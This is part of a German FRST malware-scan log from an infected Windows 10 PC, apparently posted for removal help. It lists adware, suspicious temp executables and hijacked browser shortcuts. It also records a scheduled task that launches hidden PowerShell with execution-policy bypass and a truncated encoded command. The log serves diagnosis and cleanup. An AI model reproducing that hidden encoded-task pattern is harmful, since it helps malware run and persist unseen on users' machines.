2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Dokumente und Einstellungen
2016-09-18 05:51 - 2016-10-18 12:36 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-09-18 05:47 - 2016-09-27 12:08 - 00000000 ____D C:\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-18 12:42 - 2016-09-17 21:08 - 00000000 ___RD C:\Users\maikp\OneDrive
2016-10-18 12:36 - 2016-07-16 13:47 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-10-18 12:36 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-10-17 13:22 - 2016-09-17 20:56 - 01672382 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-17 13:22 - 2016-07-17 00:51 - 00606284 _____ C:\WINDOWS\system32\perfh007.dat
2016-10-17 13:22 - 2016-07-17 00:51 - 00120056 _____ C:\WINDOWS\system32\perfc007.dat
2016-10-14 20:45 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\System
2016-10-14 18:39 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-14 17:55 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Local\VirtualStore
2016-10-14 17:53 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Local\Packages
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-05 16:48 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-03 18:19 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-02 18:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-10-01 19:22 - 2016-09-17 21:04 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-09-28 06:08 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\appcompat
2016-09-27 15:31 - 2016-09-17 21:08 - 00002394 _____ C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-09-27 15:27 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-09-27 13:05 - 2016-07-16 13:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\MUI
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\USOPrivate
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows NT
2016-09-27 12:23 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2016-09-27 12:21 - 2016-09-17 18:55 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicyUsers
2016-09-27 12:17 - 2016-09-17 18:55 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-09-27 12:17 - 2016-07-16 13:47 - 00000000 __RHD C:\Users\Public\Libraries
2016-09-27 12:14 - 2016-09-17 18:36 - 00000000 ____D C:\Users\Default.migrated
2016-09-27 12:13 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\spool
2016-09-27 12:09 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-09-27 12:08 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\MiracastView
2016-09-18 09:41 - 2016-09-17 21:07 - 00000000 ____D C:\Users\maikp\AppData\Local\AMD
2016-09-18 08:38 - 2016-09-17 21:06 - 00000000 ____D C:\Users\maikp\AppData\Local\Comms
2016-09-18 08:14 - 2016-09-17 21:05 - 00000000 ____D C:\Users\maikp\AppData\Local\PackageStaging

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-10-08 20:52 - 2016-10-08 20:52 - 7176704 _____ () C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0070704 _____ () C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0190394 _____ () C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0015792 _____ () C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0140288 _____ () C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 1928315 _____ () C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 0018432 _____ () C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0005568 _____ () C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0126464 _____ () C:\Users\maikp\AppData\Roaming\noah.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 1897576 _____ () C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0032038 _____ () C:\Users\maikp\AppData\Roaming\uninstall_temp.ico
2016-10-09 07:48 - 2016-10-12 15:46 - 0440832 _____ () C:\ProgramData\smp2.exe

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\smp2.exe


Einige Dateien in TEMP:
====================
C:\Users\maikp\AppData\Local\Temp\1150.tmp.exe
C:\Users\maikp\AppData\Local\Temp\14759530998e8c0tmp.exe
C:\Users\maikp\AppData\Local\Temp\250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\2FDC.tmp.exe
C:\Users\maikp\AppData\Local\Temp\331GYZWFPU.exe
C:\Users\maikp\AppData\Local\Temp\43C1.tmp.exe
C:\Users\maikp\AppData\Local\Temp\5482.tmp.exe
C:\Users\maikp\AppData\Local\Temp\5A2CUUZ2WJ.exe
C:\Users\maikp\AppData\Local\Temp\5B35.tmp.exe
C:\Users\maikp\AppData\Local\Temp\6347.tmp.exe
C:\Users\maikp\AppData\Local\Temp\693.tmp.exe
C:\Users\maikp\AppData\Local\Temp\84.tmp.exe
C:\Users\maikp\AppData\Local\Temp\89E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\8B91.tmp.exe
C:\Users\maikp\AppData\Local\Temp\9043.tmp.exe
C:\Users\maikp\AppData\Local\Temp\93E3.tmp.exe
C:\Users\maikp\AppData\Local\Temp\9DAA.tmp.exe
C:\Users\maikp\AppData\Local\Temp\A611.tmp.exe
C:\Users\maikp\AppData\Local\Temp\B124.tmp.exe
C:\Users\maikp\AppData\Local\Temp\B4AD.tmp.exe
C:\Users\maikp\AppData\Local\Temp\BA9A.tmp.exe
C:\Users\maikp\AppData\Local\Temp\C144.tmp.exe
C:\Users\maikp\AppData\Local\Temp\C8BC.tmp.exe
C:\Users\maikp\AppData\Local\Temp\D2D6.tmp.exe
C:\Users\maikp\AppData\Local\Temp\E9E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\EDAE.tmp.exe
C:\Users\maikp\AppData\Local\Temp\EF9.tmp.exe
C:\Users\maikp\AppData\Local\Temp\F29B.tmp.exe
C:\Users\maikp\AppData\Local\Temp\fsd1C3A.exe
C:\Users\maikp\AppData\Local\Temp\fsd1F76.exe
C:\Users\maikp\AppData\Local\Temp\fsd4F50.exe
C:\Users\maikp\AppData\Local\Temp\fsdE991.exe
C:\Users\maikp\AppData\Local\Temp\fsdEF1F.exe
C:\Users\maikp\AppData\Local\Temp\HY4UTN20J3.exe
C:\Users\maikp\AppData\Local\Temp\ICReinstall_250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\INW10DC1YD.exe
C:\Users\maikp\AppData\Local\Temp\istB73E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\nskE0D6.tmp.exe
C:\Users\maikp\AppData\Local\Temp\nsn6877.tmp.exe
C:\Users\maikp\AppData\Local\Temp\S3RC3RJNY0.exe
C:\Users\maikp\AppData\Local\Temp\sdf82D1.exe
C:\Users\maikp\AppData\Local\Temp\singleProxy.exe
C:\Users\maikp\AppData\Local\Temp\singleProxyUpdater.exe


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0646136 ____A (Microsoft Corporation) EC1F4B814049159FD303B63DDBB35E4B

C:\WINDOWS\SysWOW64\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0496872 ____A (Microsoft Corporation) AA2C3100C6622B5B7F5B2603EB9024CA

C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-10-07 14:50

==================== Ende von FRST.txt ============================
Addition
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 17-10-2016
durchgeführt von maikp (18-10-2016 14:10:09)
Gestartet von C:\Users\maikp\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 10:24:28)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1190326282-1682839636-2826347982-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1190326282-1682839636-2826347982-503 - Limited - Disabled)
Gast (S-1-5-21-1190326282-1682839636-2826347982-501 - Limited - Disabled)
maikp (S-1-5-21-1190326282-1682839636-2826347982-1002 - Administrator - Enabled) => C:\Users\maikp

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AppTrailers - AppTrailers for Desktop (HKLM-x32\...\AppTrailers) (Version: 9.1.10amt - AppTrailers) <==== ACHTUNG
Avira Connect (HKLM-x32\...\{ee247a19-722f-4096-884b-47ec3b7ec396}) (Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG) Hidden
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
Caster (HKLM\...\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}) (Version: 1.0 - Caster) <==== ACHTUNG
CleanBrowser (HKLM-x32\...\CleanBrowser) (Version:  - ) <==== ACHTUNG
DailyBee - DailyBee for Desktop (HKLM-x32\...\DailyBee) (Version: 9.1.10cm - DailyBee)
DPower version 1.0 (HKLM-x32\...\DPower_is1) (Version: 1.0 - WeMonetize) <==== ACHTUNG
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B4F0E794-11F5-4971-85EC-6D7F2E4DAC68}) (Version: 4.4.3 - SEIKO EPSON CORPORATION)
EPSON XP-530 Series Printer Uninstall (HKLM\...\EPSON XP-530 Series) (Version:  - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.52.0.0 - SEIKO EPSON CORPORATION)
FunFeedr (HKLM-x32\...\FunFeedr) (Version: 3.0.1 - FunFeedr)
InterHop (HKLM-x32\...\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}) (Version: 1.0.0 - InterHop)
Mozilla Firefox 49.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 de)) (Version: 49.0.1 - Mozilla)
SafeFinder (HKLM-x32\...\{A226FB98-97EE-4616-8CFD-5C14FDEB22AA}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
Search module (HKLM-x32\...\Search module) (Version:  - Goobzo) <==== ACHTUNG
shopperz (HKLM-x32\...\{F0422270-2580-43FE-b53A-7F0BA1FB86E9}) (Version: 2.0.0.480 - shopperz) <==== ACHTUNG
Social2Search (HKLM\...\ad11222373fdc03dd874a65a6c6001bc) (Version: 11.12.1.13 (i1.0) - Social2Search) <==== ACHTUNG
Social2Search (HKLM\...\bf7821d4713d4971d25a53d8d6cb8f99) (Version: 11.12.1.29 (i1.0) - Social2Search) <==== ACHTUNG
System Healer (HKLM-x32\...\SystemHealer) (Version: 4.5.0.1 - SystemHealer) <==== ACHTUNG
Traffic Exchange (HKLM-x32\...\{96627CEF-1947-4E94-BA3C-259FF5EAAEF6}) (Version: 1.0.0 - Microleaves)
trotux - Uninstall (HKLM-x32\...\{07218582-B6FD-4D52-B9A8-C7E03FB69770}) (Version:  - ) <==== ACHTUNG
Usenet.nl (HKLM-x32\...\Usenet.nl_is1) (Version:  - )
WebDiscover Browser 2.167.2 (HKLM\...\{fd13f4a2-b0d8-4cad-9ccf-d4128eaf25ff}_is1) (Version: 2.167.2 - WebDiscover Media)
WebShield (HKLM-x32\...\WebShield) (Version:  - )
WIN (HKLM-x32\...\win_en_77_is1) (Version:  - ) <==== ACHTUNG
Y2Go (HKLM-x32\...\Y2Go) (Version:  - Y2Go)
YellowSend (HKLM-x32\...\YSPackage) (Version:  - CMI Limited) <==== ACHTUNG
youndoo - Uninstall (HKLM-x32\...\{CEA17DCC-0602-428D-9596-D1AD64B43EBC}) (Version:  - ) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0017173C-CAAE-4FF8-B11D-840CE6D30C93} - System32\Tasks\ChelfNotify Task => C:\ProgramData\ChelfNotify\BrowserUpdate.exe [2016-06-30] (Tencent) <==== ACHTUNG
Task: {1855628C-47BF-4CD0-B789-43CA8B7CAF0C} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2016-10-06] (Microleaves)
Task: {1EF81F3F-D1F9-40CE-95A6-5531247BBBBE} - System32\Tasks\Y2Go\Updater\Y2GoUpdater => C:\Program Files (x86)\Y2GoUpdater\updater.exe [2016-10-07] ()
Task: {1F9D81BA-4F7C-422B-877F-BEFE0DE612B0} - System32\Tasks\GEN_Interval => C:\Users\maikp\AppData\Local\Programs\GEN\GEN.exe [2016-07-18] (                                                            )
Task: {355B39B3-3452-48F0-ACD6-F1932523C419} - System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE [2013-11-21] (SEIKO EPSON CORPORATION)
Task: {496A8A2B-AE74-4CA8-BBD9-39D9A0A16A87} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-09-12] () <==== ACHTUNG
Task: {5BE995DC-CA12-44E6-97D1-FE649B0F938A} - System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG
Task: {6FFC60CF-B8DE-4C8D-8A2B-F68074C3ED27} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {8126B887-39E4-49BA-8633-9C0685D6E70D} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-10-12] () <==== ACHTUNG
Task: {A62A3851-A1C4-4CD5-9978-8C38CA5DA89D} - System32\Tasks\Y2Go\Y2Go\Y2Go => C:\Program Files (x86)\Y2Go\bin\Y2Go.exe [2016-10-07] ()
Task: {A7076610-4363-40B6-ACE9-E968DC802F0C} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-09-20] (Microsoft Corporation)
Task: {AB9CCB7B-0F41-40E5-BC6C-250452E3148C} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-09-12] () <==== ACHTUNG
Task: {ABFE0F01-4EE7-4AF1-A4C8-18849CC5BDFA} - System32\Tasks\GEN => C:\Users\maikp\AppData\Local\Programs\GEN\GEN.exe [2016-07-18] (                                                            )
Task: {AF204B35-325A-4369-974A-95D8372A5575} - System32\Tasks\{7F097A47-0A04-7A0C-7911-047E0C041104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAOwA7ACAAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQA (Der Dateneintrag hat 10000 mehr Zeichen). <==== ACHTUNG
Task: {AFBE50C1-1D77-4027-BC73-650D9C696D61} - System32\Tasks\Anezotionprodily Verfier => C:\Program Files (x86)\Memucoojick\coits.exe [2016-10-09] (VideoLAN)
Task: {B4071208-9165-435B-A30D-817D7AEB92DB} - System32\Tasks\WebDiscover Browser Update Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {BAB458B2-2CD8-4CC2-B8A8-49EFD8FC82EF} - System32\Tasks\WebDiscover Browser Launch Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {D3B72B85-9FE1-4E54-A6A2-4089A313818B} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {D3D24DB8-113F-4EF0-BB9E-36BA89FB1069} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {D6804DD5-C949-42C4-A972-352AA7D0581A} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-09-12] () <==== ACHTUNG
Task: {DC5EADB5-EF38-4526-A30C-9351D9C2576C} - System32\Tasks\Jizergh Launcher => C:\Program Files (x86)\Ferqesp\qegph.exe [2016-10-08] (Glarysoft Ltd)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE:/EXE:{DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} /F:UpdateWORKGROUP\DESKTOP-CHK5R9U$
Searches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\System HealerPeriod.job =>  <==== ACHTUNG
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-08-11 15:06 - 2016-10-09 07:59 - 00271872 _____ () C:\Program Files\Yhid\Veticeq.exe
2016-10-08 20:52 - 2016-10-07 19:08 - 03786752 _____ () C:\ProgramData\Logic Handler\set.exe
2016-10-08 20:55 - 2016-10-08 20:55 - 00445952 _____ () C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs
2016-08-12 21:23 - 2016-10-14 18:54 - 00360448 _____ () C:\Program Files (x86)\WebShield\WebShield.exe
2016-10-14 17:54 - 2016-10-09 10:57 - 00159232 _____ () C:\Program Files (x86)\InterHop\InterHop.exe
2016-09-26 09:00 - 2016-09-28 10:08 - 00057856 _____ () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00170496 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2016-05-19 16:41 - 2016-05-19 16:41 - 00134656 _____ () C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
2016-10-14 17:53 - 2016-10-14 04:25 - 00693976 _____ () C:\Program Files (x86)\WinSaber\WinSaber.exe
2016-08-11 15:06 - 2016-10-09 07:59 - 00255488 _____ () C:\Program Files\Yhid\Amaak.exe
2016-10-08 20:57 - 2016-05-27 11:41 - 00985312 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00668672 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.dll
2016-10-07 09:18 - 2016-10-07 09:18 - 02329584 _____ () C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
2016-09-12 11:21 - 2016-09-12 11:21 - 02606280 _____ () C:\Program Files (x86)\SystemHealer\SystemHealer.exe
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01864384 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64\ClientTelemetry.dll
2016-07-16 13:42 - 2016-07-16 13:42 - 00130048 _____ () C:\WINDOWS\SYSTEM32\CHARTV.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00112128 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00143872 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-08-11 15:06 - 2016-10-09 07:59 - 00559104 _____ () C:\Program Files\Yhid\Ezolbusp.exe
2016-09-30 06:31 - 2016-09-15 18:24 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-11 15:06 - 2016-10-09 07:59 - 00704512 _____ () C:\Program Files\Yhid\Ezolbusp64.exe
